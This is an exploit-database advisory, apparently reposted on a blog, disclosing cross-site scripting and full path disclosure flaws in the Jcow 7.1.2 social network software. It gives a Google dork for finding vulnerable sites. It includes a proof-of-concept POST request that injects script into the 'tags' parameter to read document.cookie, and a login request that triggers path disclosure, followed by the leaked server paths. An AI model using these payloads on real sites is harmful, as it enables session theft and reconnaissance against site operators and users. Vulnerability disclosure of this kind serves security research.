1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm DaOne member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
---------------------------------------------------
# Exploit Title: Jcow 7.1.2 XSS/FPD Vulnerabilities
# Author: DaOne aka MockingBird
# Category: webapps/php
# Version: 7.1.2
# Google dork: "Powered by Jcow 7.1.2"
---------------------------------------------------
[#] [XSS]
the application does not validate the 'tags' parameter {/index.php?p=streampublish}
script code would execute in {/index.php?p=videos/viewstory/*id*}
-PoC-
POST /jcow.7.1.2.ce/index.php?p=streampublish HTTP/1.1
page_id=1&oncomment=0&page_type=u&message=Share+with+your+followers...&video_title=DaOne&description=tst&tags="><ScRiPT>alert(document.cookie)</ScRiPT>&youtube_url=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DErCAOMi5EGM&youtubeid=&attachment=videos
[#] [Full Path Disclosure]
POST /jcow.7.1.2.ce/index.php?p=member/loginpost HTTP/1.1
username[]=tst&password=tst
/jcow.7.1.2.ce/includes/libs/apps.inc.php
/jcow.7.1.2.ce/includes/libs/u.module.php
/jcow.7.1.2.ce/modules/admin/admin.php
/jcow.7.1.2.ce/modules/apps/apps.php
/jcow.7.1.2.ce/themes/default/home.tpl.php
# FE3F5F237889B11D 1337day.com [2013-09-05] C2E397F31D91D749 #
0 comentários:
Postar um comentário